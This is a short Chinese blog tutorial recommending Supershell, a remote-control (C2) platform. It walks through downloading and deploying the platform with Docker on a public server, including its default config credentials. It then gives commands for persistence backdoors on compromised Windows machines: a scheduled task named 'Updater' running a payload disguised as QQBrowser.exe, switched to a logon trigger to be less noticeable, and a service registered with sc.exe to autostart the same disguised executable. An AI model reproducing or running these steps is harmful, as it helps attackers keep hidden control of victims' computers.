Supershell远控部署

今天搭建了一下supershell，蛮好用的，推荐一手。
GITHUB地址：https://github.com/tdragon6/Supershell

部署

首先必须要先有一台自己的公网服务器，可以考虑阿里云，腾讯云，华为云，百度云之类的。
然后就开始搭建！
输入命令行，下载解压源码

wget https://github.com/tdragon6/Supershell/releases/latest/download/Supershell.tar.gz
tar -zxvf Supershell.tar.gz
cd Supershell

config.py为系统配置文件，其中包含username和password，docker-compose.yml为组件配置文件，其中包括redis，nginx等组件的映射端口。

config.py

# web登录和会话配置信息  
user = 'tdragon6'  
pwd = 'b7671f125bb2ed21d0476a00cfaa9ed6' # 明文密码 tdragon6 的md5  
  
# jwt加密盐  
global_salt = 'Be sure to modify this key' # 必须修改，不然可以伪造jwt token直接登录  
  
# 会话保持时间，单位：小时  
expire = 48  
  
  
# 共享远控shell的共享密码  
share_pwd = 'b7671f125bb2ed21d0476a00cfaa9ed6' # 明文密码 tdragon6 的md5  
  
# 共享shell会话保持时间，单位：小时  
share_expire = 24

确保8888和3232端口没有被占用，若被占用，需要合理修改端口。

netstat -al  #查看所有端口

设置公网地址环境变量

export EXTERNAL_ADDRESS=<公网地址>:<rssh公网端口>

构建

docker-compose up -d

访问管理平台

http://公网IP:8888

简单的两种快速维权方式

计划任务后门

schtasks命令设定计划自动启动后门程序。

#每5分钟自动执行install.exe
schtasks /create /tn Updater /tr C:\Users\Administrator\QQBrowser.exe /sc minute /mo 5

直接启动一个定时任务
schtasks /rn /rn 任务名称
定时任务删除
schtasks /delete /tn 任务名称

时间触发过于明显，设置登陆触发更为隐蔽

schtasks /create /tn Updater /tr C:\Users\Administrator\QQBrowser.exe /sc onlogon

详细查看自启任务

schtasks /query /v /tn Updater

服务自启动后门

自启动服务一般是在电脑启动后在后台加载指定的服务程序，我们可以将exe文件注册为服务，也可以将dll文件注册为服务。

sc.exe create QQBrowser binpath= c:\Users\Public\QQBrowser.exe（注意等号后面有空格）#创建服务
sc.exe config QQBrowser start= auto #设置服务为自动启动
net start QQBrowser #启动服务

删除服务

sc.exe delete QQBrowser